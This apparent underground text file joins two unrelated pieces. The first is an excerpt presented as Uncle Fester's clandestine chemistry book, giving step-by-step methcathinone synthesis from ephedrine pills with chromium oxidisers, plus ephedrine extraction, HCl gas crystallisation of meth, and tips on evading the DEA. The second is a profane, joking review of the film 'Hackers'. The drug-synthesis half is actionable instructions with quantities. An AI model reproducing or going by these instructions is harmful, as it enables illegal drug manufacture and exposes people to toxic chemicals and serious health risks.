| "Secrets of Methamphetamine Manufacture" by Uncle Fester. This is a tried | |
| and proven method by many people. If you want a copy of this book, contact | |
| me. | |
| Good luck and keep away from the DEA | |
| M E T H C A T H I N O N E | |
| K I T C H E N I M P R O V I E S E D C R A N K | |
| The latest designer variant upon the amphetamine molecule to gain | |
| popularity and publicity is methcathinone, commonly called cat. This | |
| substance is remarkably similar to the active ingredient found in the | |
| leaves of the khat tree which the loyal drug warriors on the network news | |
| blame for turning peace loving Somalis into murderous psychopaths. The | |
| active ingredient in the khat leaves is cathinone, which has the same | |
| structural relationship to methcathinone that amphetamine has to | |
| methamphetamine. It is made by oxidizing ephedrine, while meth can be | |
| made by reducing ephedrine. | |
| The high produced by methcathinone is in many ways similar to | |
| methamphetamine. For something so easily made and purified, it is | |
| actually quite enjoyable. the main differences between the meth high and | |
| the methcathinone high are length of action and body fell. With | |
| methcathinone, one can expect to still get to sleep about 8 hours after a | |
| large dose. On the down side, it definitely gives me the impression that | |
| the substance raises the blood pressure quite markedly. This drug may not | |
| be safe for people with weak hearts of blood vessels. Be warned! | |
| Cat is best made using chrome in the +6 oxidation state as the | |
| oxidizer. I recall seeing an article in the narco swine's Journal of | |
| Forensic Science bragging about how they worked out a method for making it | |
| using permanganate, but that method gives an impure product in low yields. | |
| Any of the common hexavalent chrome salts can be used as the oxidizer in | |
| this reaction. This list include chrome trioxide (CrO3), sodium or | |
| potassium chromate (Na2CrO4), and sodium or potassium dichromate | |
| (Na2Cr2O7). All of these chemicals are very common. Chrome trioxide is | |
| used in great quantities in chrome plating. The chromates are used in | |
| tanning and leather making. | |
| To make methcathinone, the chemist starts with the water extract of | |
| ephedrine pills. The concentration of the reactants in this case is not | |
| critically important, so it is most convenient to use the water extract of | |
| the pills directly after filtering without any boiling away of the water. | |
| See the section at the beginning of Chapter 15 [I included this at the end | |
| of the file] on extracting ephedrine form pills. Both ephedrine | |
| hydrochloride and sulfate can be used in this reaction. | |
| The water extract of 1000 ephedrine pills is placed into any | |
| convenient glass container. A large measuring cup is probably best since | |
| it has a pouring lip. Next, 75 grams of any of the above mentioned +6 | |
| chrome compounds are added. They dissolve quite easily to form a reddish | |
| or orange colored solution. Finally, concentrated sulfuric acid is added. | |
| If CrO3 is being used, 21 mL is enough for the job. If one of the | |
| chromates is being used, 42 mL is called for. These ingredients are | |
| thoroughly mixed together, and allowed to sit for several hours with | |
| occasional stirring. | |
| After several hours have passed, lye solution is added to the batch | |
| until it is strongly basic. Very strong stirring accompanies this process | |
| to ensure that the cat is converted to the free base. Next, the batch is | |
| poured into a sep funnel, and a couple hundred mLs of toluene is added. | |
| Vigorous shaking, as usual, extracts the cat into the toluene layer. It | |
| should be clear to pale yellow in color. The water layer should be orange | |
| mixed with green. The green may settle out as a heavy sludge. The water | |
| layer is thrown away, and the toluene layer containing the cat is washed | |
| once with water, then poured into a beaker. Dry HCl gas is passed through | |
| the toluene as described in Chapter 5 [I included this at the end of the file] | |
| to get white crystals of cat. The yield is between 15 and 20 | |
| grams. This reaction is scaled up quite easily. | |
| CHAPTER 15 (part of it anyway) | |
| P R O C E D U R E F O R O B T A I N I N G P U R E E P H E D R I N E | |
| F R O M S T I M U L A N T P I L L S | |
| In the present chemical supply environment, the best routes for making | |
| meth start with ephedrine as the raw material. To use these routes, a | |
| serious hurdle must first be overcome. This hurdle is the fact that the | |
| most easily obtained source of ephedrine, the so-called stimulant or | |
| bronchodilator pills available cheaply by mail order, are a far cry from | |
| the pure starting material a quality minded chemist craves. Luckily, | |
| there is a simple and very low profile method for separating the fillers | |
| in these pills from the desired active ingredient they contain. | |
| A superficial paging through many popular magazines[New Body is where | |
| I found it at GNC] reveals them to be brim full of ads | |
| from mail order outfits offering for sale "stimulant" or "bronchodilator" | |
| pills. These are the raw materials today's clandestine operator requires | |
| to manufacture meth without detection. The crank maker can hide amongst | |
| the huge herd of people who order these pills for the irritating and | |
| nauseating high that can be had by eating them as is. I have heard of a | |
| few cases where search warrants were obtained against people who ordered | |
| very large numbers of these pills, but I would think that orders of up to | |
| a few thousand pills would pass unnoticed. If larger numbers are | |
| required, maybe one's friends could join in the effort. | |
| The first thing one notices when scanning these ads is the large | |
| variety of pills offered for sale. When one's purpose is to convert them | |
| into methamphetamine, it is very easy to eliminate most of the pills | |
| offered for sale. Colored pills are automatically rejected because one | |
| does not want the coloring to be carried into the product. Similarly, | |
| capsules are rejected because individually cutting open capsules is just | |
| too much work. Bulky pills are to be avoided because they contain too much | |
| filler. The correct choice is white cross thins, preferably containing | |
| ephedrine HCl instead of sulfate, because the HCl salt can be used in more | |
| of the reduction routes than can the sulfate. | |
| Once the desired supply of pills is in hand, the first thing which | |
| should be done is to weigh them. This will give the manufacturer an idea | |
| of how much of the pills is filler, and how much is active ingredient. | |
| Since each pill contains 25 milligrams of ephedrine HCl, a 1000 lot bottle | |
| contains 25 grams of active ingredient. A good brand of white cross thins | |
| will be around 33% to 40% active ingredient. 25 grams of ephedrine HCl | |
| may not sound like much, but if it is all recovered from these pills, it | |
| is enough to make from 1/2 to 3/4 ounce of pure meth. This is worth three | |
| or four thousand dollars, not a bad return on the twenty odd dollars a | |
| thousand lot of such pills costs. [I don't know where he got 3 or 4 | |
| thousand dollars from, but the pills go for about $35.00/1000 now. 2 | |
| months ago they were $25.00 but now they have to do more paper work | |
| because it is a DEA controlled substance] | |
| To extract the ephedrine from the pills, the first thing which must be | |
| done is to grind them into a fine powder. This pulverization must be | |
| thorough in order to ensure complete extraction of the ephedrine form the | |
| filler matrix in which it is bound. A blender does a fine job of this | |
| procedure, as will certain brands of home coffee grinders. | |
| Next, the powder from 1000 pills is put into a glass beaker, or other | |
| similar container having a pouring lip, and about 300 mL of distilled | |
| water is added. Gentle heat is then applied to the beaker, as for example | |
| on a stove burner, and with steady stirring the contents of the beaker are | |
| slowly brought up to a gentle boil. It is necessary to stir constantly | |
| because of the fillers will settle to the bottom of the beaker and cause | |
| burning if not steadily stirred. | |
| Once the contents of the beaker have been brought to a boil, it is | |
| removed from the heat and allowed to settle. Then the water is poured out | |
| of the beaker through a piece of filter paper. The filtered water should | |
| be absolutely clear. Next, another 50 mL of water is added to the pill | |
| filler sludge, and it too is heated with stirring. Finally, the pill | |
| sludge is poured into the filter, and the water it contains is allowed to | |
| filter through. It too should be absolutely clear, and should be mixed in | |
| with the first extract. A little water may be poured over the top of the | |
| filler sludge to get the last of the ephedrine out of it. This sludge | |
| should be nearly tasteless, and gritty in texture. The water extract | |
| should taste very bitter, as it contains the ephedrine. | |
| The filtered water is now returned to the stove burner, and half of | |
| the water it contains is gently boiled away. Once this much water has | |
| been boiled off, precautions should be taken to avoid burning the | |
| ephedrine. The best alternative is to evaporate the water off under a | |
| vacuum. If this is not practical with the equipment on hand, the water | |
| may be poured into a glass baking dish. This dish is then put into the | |
| oven with the door cracked open, and the lowest heat applied. In no time | |
| at all, dry crystals of ephedrine HCl can be scraped out of the baking | |
| dish with a razor blade. The serious kitchen experimenter may wish to | |
| further dry them in a microwave. | |
| Chapter 5 (The part about the HCl gas) | |
| A source of anhydrous hydrogen chloride gas is now needed. The | |
| chemist will generate his own. The glassware is set up as in Figure 1. | |
| He will have to bend another piece of glass tubing to the shape shown. It | |
| should start out about 18 inches long. One end of it should be pushed | |
| through a one hole stopper. A 125 mL sep funnel is the best size. The | |
| stoppers and joints must be tight, since pressure must develop inside this | |
| flask to force the hydrogen chloride gas out through the tubing as it is | |
| generated. | |
| Into the 1000 mL, three-necked flask is placed 200 grams of table | |
| salt. Then 25% concentrated hydrochloric acid is added to this flask until | |
| it reaches the level shown in the figure. The hydrochloric acid must be | |
| of laboratory grade [I use regular muriatic acid for pools]. | |
| Figure 1: | |
| \ / | |
| \ /ķ | |
| ֽ ӷ <--125 mL separatory funnel | |
| ӷ ֽ | |
| ķ Ľ glass tubing Ŀ | |
| ӷ ֽ | |
| ͻ | |
| stopcock->ۺĴ Salt and Hydrochloric acid | |
| stopper ->ķ \/з ķ <-1 hole mixed into a paste by add- | |
| ĺ ĺ stopper ing HCL to salt and mixing. | |
| Ľ Ľ Ľ ķ The surface should be rough | |
| ֽ ӷ and a good number of holes | |
| should be poked into the | |
| 1000 mL, 3 neck flask paste for long lasting | |
| generation of HCl gas. | |
| ӷ acid/salt level ֽ | |
| ķ Ľ | |
| ķ Ľ | |
| ķ Ľ | |
| Ľ | |
| Some concentrated sulfuric acid (96-98%) is put into the sep funnel | |
| and the spigot turned so that 1 mL of concentrated sulfuric acid flows | |
| into the flask. It dehydrates the hydrochloric acid and produces hydrogen | |
| chloride gas. This gas is then forced by pressure through the glass | |
| tubing. | |
| One of the Erlenmeyer flasks containing methamphetamine in solvent is | |
| placed so that the glass tubing extends into the methamphetamine, almost | |
| reaching the bottom of the flask. Dripping in more sulfuric acid as | |
| needed keeps the flow of gas going to the methamphetamine. If the flow if | |
| gas is not maintained, the methamphetamine may solidify inside the glass | |
| tubing, plugging it up. | |
| Within a minute of bubbling, white crystals begin to appear in the | |
| solution, More and more of them appear as the process continues. It is an | |
| awe-inspiring sight. In a few minutes, the solution becomes as thick as | |
| watery oatmeal. | |
| It is now time to filter out the crystals, which is a two man job. | |
| The flask with the crystals in it is removed from the HCl source and | |
| temporarily set aside. The three-necked flask is swirled a little to | |
| spread around the sulfuric acid and then the other Erlenmeyer flask is | |
| subjected to a bubbling with HCl. While this flask is being bubbled, the | |
| crystals already in the other flask are filtered out. | |
| The filtering flask and Buchner funnel are set up as shown in figure | |
| 2. The drain stem of the buchner funnel extends all the way through the | |
| rubber stopper, because methamphetamine has a nasty tendency to dissolve | |
| rubber stoppers. This would color the product black. A piece of filter | |
| paper covers the flat bottom of the Buchner funnel. The vacuum is turned | |
| on and the hose attached to the vacuum nipple. Then the crystals are | |
| poured into the Buchner funnel. The solvent and uncrystallized | |
| methamphetamine pass through the filter paper and the crystals stay in the | |
| Buchner funnel as a solid cake. About 15 mL of solvent is poured into the | |
| Erlenmeyer flask. the top of the flask is covered with the palm and it is | |
| shaken to suspend the crystals left clinging to the sides. This is also | |
| poured into the Buchner funnel. Finally, another 15 mL of solvent is | |
| poured over the top of the filter cake. | |
| Figure 2: | |
| Ŀ | |
| <-Bchner Funnel | |
| ___________ | |
| \ / | |
| \ / | |
| \ / | |
| Ŀ | |
| <--To vacuum | |
| Ŀ | |
| Ŀ | |
| Filtering | |
| flask--> | |
| Now the vacuum hose is disconnected and the Buchner funnel, stopper | |
| and all, is pulled from the filtering flask. All of the filtered solvent | |
| is poured back into the erlenmeyer flask it came from. It is returned to | |
| the HCl source for more bubbling. The Buchner funnel is put back into the | |
| top of the filtering flask. It still contains the filter cake of | |
| methamphetamine crystals. It will now be dried out a little bit. The | |
| vacuum is turned back on, the vacuum hose is attached to the filtering | |
| flask, and the top of the Buchner funnel is covered with the palm or | |
| section of latex rubber glove. The vacuum builds and removes most of the | |
| solvent from the filter cake. This takes about 60 seconds. The filter | |
| cake can now be dumped out onto a glass or China plate (not plastic) by | |
| tipping the Buchner funnel upside-down and tapping it gently on the plate. | |
| And so, the filtering process continues, one flask being filtered | |
| while the other one is being bubbled with HCl. Solvent is added to the | |
| Erlenmeyer flask to keep their volumes at 300 mL. Eventually, after each | |
| flask has been bubbled for about seven times, no more crystal will come | |
| out and the underground chemist is finished. | |
| If ether was used as the solvent, the filter cakes on the plates will | |
| be nearly dry now. With a knife from the silverware drawer, the cakes are | |
| cut into eighths. They are allowed to dry out some more then chopped up | |
| into powder. If benzene was used, this process takes longer. Heat lamps | |
| may be used to speed up this drying, but no stronger heat source. | |
| [The above section of chapter 5 is talking about methamphetamine. You | |
| could, in most instances, substitute the word methcathinone, but I wanted | |
| to present the text to you in its exact form.] | |
| ------------------------------------------------------------------------------ | |
| Review of "HACKERS" | |
| By Wile Coyote | |
| Sorry, it might be a little long... cut it to ribbons if you want, most | |
| of it is just a rant anyway... Hope you enjoy it. | |
| First off, I have to admit that I was biased going into the movie | |
| "Hackers"... I heard that it wasn't going to be up to snuff, but did I | |
| let that stop me? No, of course not... I sucked up enough courage to | |
| stride towards my girlfriend and beg for seven bucks... :) She ended up | |
| wanting to see the movie herself (and sadly, she rather enjoyed it... | |
| oh, well, what can you do with the computer illiterate or is it the | |
| computer illegitimate?). Now onto.... | |
| THE MOVIE | |
| (Yes, I AM going to give you a second-by-second playback of the | |
| movie... you don't want me to spoil the plot, you say? Well, don't | |
| worry, there is no plot to spoil! :) just kidding, go see it... maybe | |
| you'll like it...) | |
| Well, from the very first few seconds, I was unimpressed... It begins | |
| with an FBI raid on some unsuspecting loose (who turns out to be the | |
| main character, but that's later) named Zero Cool (can you say "EL1EEEEET | |
| WaReZ D00D!!!!!!!1!!!!!111!!!!"). The cinematography was bad... (Hey, | |
| cinematography counts!) But, the acting was worse. The Feds bust into | |
| this home and run up the stairs, all while this lady (the mom) just kind | |
| of looks on dumbfounded and keeps saying stuff like "hey, stop that...", | |
| or something (is this what a raid is like? I've never had the pleasure...) | |
| Ok, so the story goes on like this: The 11 year old kid made a computer | |
| virus that he uploads to, I think, the NY stock exchange, and it crashes | |
| 1,507 computers. There is a really lame court scene where the kid is | |
| sentenced to 7 years probation where he can't use a computer or a | |
| touch-tone phone... That was 1988... | |
| Time passes... Now it's 1995, and boy have things changed (except the | |
| mom... hmmm....). Now the ex-hacker is allowed to use a computer (his | |
| 18th b-day) and (somehow) he is just a natural at hacking, and is (gold?) | |
| boxing some TV station to change the program on television (yes, I know | |
| that all of you super-el33t hackers hack into TV stations when you don't | |
| like what's on Ricki Lake!). N-e-way, while hacking into their | |
| super-funky system (the screen just kind of has numbers moving up and | |
| down the screen like some kind of hex-editor on acid...) | |
| he gets into a "hacking battle" with some other hacker called Acid Burn | |
| (I don't think I have ever seen such a trippy view of the "Internet"... | |
| lots of Very high-end graphics, not very realistic, but it's Hollywood...). | |
| In the end, the other hacker kicks the shit out of him (he has changed | |
| his handle to Crash Override now, just to be cool, i guess) and logs him | |
| off the TV station. Wow, tense... cough... | |
| For those of you who care, let me describe the "hacker" Crash Override: | |
| He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is | |
| (kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky) | |
| clothes, and the CDC might have quite a bit to say about the amount of | |
| leather he wears... I mean, there are limits to that kind of stuff, man! | |
| And to top off his coolness, he is, like, the roller-blade king of the | |
| world. (Not that hackers don't roller-blade, but he does it just Soooo | |
| much cooler than I could... :) ). And yet, here's the nifty part, | |
| despite all of his deft coolness, he couldn't get a girl for the life | |
| of him (we all morn for him in silent prayer). | |
| Ok, so now Crash is at school, and he meets Wonderchick (who is | |
| EXACTLYFUCKINGLIKEHIM, and is , of course, an 3L31t hackerette... ok, she | |
| is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to | |
| spoil the suspense). | |
| Now, while at school, he wants to hook up with wonderchick, so he breaks | |
| into the school's computer (it must be a fucking Cray to support all of | |
| the high-end-type graphics that this dude is pulling up) and gets his | |
| English(?) class changed to hers. So, some other super-d00dcool hacker | |
| spots him playing around with the schools computer (it's funny how may | |
| elite hackers one can meet in a new york public school...), so he | |
| catches up with Crash and invites you to an elite (Oh, if you ever want | |
| to see a movie where the word 3l333333333t is used, like a fucking | |
| million times, then go see Hackers...) hackerz-only club, complete with | |
| million-dollar virtual-reality crap and even a token phreaker trying to | |
| red-box a pay-phone with a cassette recorder (never mind that the music is | |
| about 197 decibels, the phone can still pick up the box tones...). | |
| What follows is that Crash meets up with some seriously k-rad hackers | |
| (Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and | |
| Phantom Phreak : who reminds of that gay kid on "my so called life... | |
| maybe that was him?";Lord Nikon : the token black hacker... Photographic | |
| memory is his super-power). They talk about k00l pseudo-hacker shit and | |
| then a l00ser warez-type guy comes up and tries to be El33t like everybody | |
| else. He is just about the ONLY realistic character in the whole movie. | |
| He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?". He keeps | |
| saying "I need a handle, then I'll be el33t!". (Why he can't just pick | |
| his own handle, like The Avenging Turd or something, is beyond me... He | |
| plays lamer better than the kids in Might Morphin Power Rangers... awesome | |
| actor!). N-e-way, this is where the major discrepancies start. Ok, | |
| first they try to "test" Lamerboy by asking him what the four most used | |
| passwords are. According to the movie, they are "love, sex, god, and | |
| secret". (Hmmmm.... I thought Unix required a 6-8 char. password....). | |
| Somehow lamerboy got into a bank and screwed with an ATM machine four | |
| states away; all of the hacker chastise him for being stupid and hacking | |
| at home (If you watch the movie, you'll notice that the hackers use just | |
| about every pay-phone in the city to do their hacking, no, THAT doesn't | |
| look suspicious)Next they talk about "hacking a Gibson". | |
| (I was informed that they WANTED to use "hacking a Cray", | |
| but the Cray people decided that they didn't want THAT kind of publicity. | |
| I've never heard of a Gibson in real life, though...). | |
| They talk about how k-powerful the security is on a Gibson, and they say | |
| that if Lamerboy can crack one, then he gets to be elite. | |
| Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash | |
| loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy | |
| finally cracks a Gibson with the password God (never mind a Login name or | |
| anything that cool). Then the cheese begins in full force. The Gibson | |
| is like a total virtual-reality thingy. Complete with all sorts of cool | |
| looking towers and neon lightning bolts and stuff. Lamerboy hacks into a | |
| garbage file (did I mention that the entire world is populated by Macs? | |
| Oh, I didn't... well, hold on :)...). So, this sets alarms off all | |
| over the place (cause a top-secret file is hidden in the garbage, see?), | |
| and the main bad-guy, security chief Weasel, heads out to catch him. He | |
| plays around with some neon, star-trek-console, buttons for a while, | |
| then calls the "feds" to put a trace on the kid. La de da, ess catches him | |
| in a second, and the kid only gets half of the file, which he hides. | |
| (to spoil the suspense, yet again, the file is some kind of money getting | |
| program, like the kind some LOD members wrote about a long time ago in | |
| Phrack, which pulls money from each transaction and puts it into | |
| a different account. Needless to say, the Security Weasel is the guy who | |
| wrote it, which is why he needs it back, pronto!). | |
| As we travel along the movie, the hackers keep getting busted for tapping | |
| into the Gibson, and they keep getting away. The "action" heats up when | |
| Wonderchick and Crash get into a tiff and they decide to have a hacking | |
| contest... They go all over the city trying their best to fuck with | |
| the one fed they don't like.... Brilliant move, eh? The movie kind of | |
| reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop. | |
| They all fondle over the machine with the same intensity that Captain Kirk | |
| gave to fighting Klingons, and frankly, their acting abilities seems | |
| to ask "please deposit thirty-five cents for the next three minutes". | |
| It was funny listening to the actors, 'cause they didn't know shit about | |
| what they were saying... Here's a clip: | |
| Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem... Not | |
| Kbps, mind you :)...I wonder where they designed a .8 of a bit?) | |
| Yeah! Cool... Hey what kind of chip does it have in it? | |
| A P6! Three times faster than a Pentium.... Yep, RISC is the wave of | |
| the future... (I laughed so hard..... Ok, first of all, it is a Mac. | |
| Trust me, it has the little apple on the cover. Second it has a P6, what | |
| server she ripped this out of, I dare not ask. How she got that | |
| bastard into a laptop without causing the casing to begin melting is | |
| yet another problem... those get very hot, i just read about them | |
| in PC magazine (wow, I must be elite too). Finally, this is a *magic* P6, | |
| because it has RISC coding.... | |
| I kinda wished I had stayed for the credits to see the line: | |
| Technical advisor None.... died on route to work...) | |
| Finally they ask something about the screen, and they find out it is | |
| an..... hold your breath.... ACTIVE MATRIX! ... Kick ass! | |
| They do lots of nifty things with their magic laptops (I noticed that they | |
| ALL had laptops, and they were ALL Macintoshes. Now, I'm not one to say | |
| you can't hack on a mac, 'cause really you can hack on a TI-81 if you've | |
| got the know.... but please, not EVERYONE in the fucking movie | |
| has to have the exact same computer (different colors, though... there | |
| was a really cool clear one).... it got really sad at the end), and they | |
| finally find out what the garbage file that Lamerboy stole was, this time | |
| using a hex editor/CAD program of some sort. | |
| As we reach the end of the movie, the hackers enlist the help of two very | |
| strangely painted phone phreaks who give the advice to the hackers to send | |
| a message to all of the hackers on the 'net, and together, they all | |
| kicked some serious ass with the super-nifty-virtual-reality Gibson. | |
| In the end, all of the Hackers get caught except for one, who pirates all | |
| of the TV station in the world and gives the police the "real" story... | |
| So, the police politely let them go, no need for actually proving that the | |
| evidence was real or anything, of course. | |
| So, in the end, I had to say that the movie was very lacking. It seemed | |
| to be more of a Hollywood-type flashy movie, than an actual documentary | |
| about hackers. Yes, I know an ACTUAL movie about hacker would suck, but | |
| PLEASE, just a LITTLE bit of reality helps keep the movie grounded. It | |
| may have sucked less if they didn't put flashing, 64 million color, | |
| fully-rendered, magically delicious pictures floating all over the screen | |
| instead of just a simple "# " prompt at the bottom. With all of the | |
| super-easy access to all of the worlds computers, as depicted in the movie, | |
| ANYBODY can be a hacker, regardless of knowledge, commitment, or just | |
| plain common sense. And that's what really made it suck... | |
| Hope you enjoyed my review of HACKERS! | |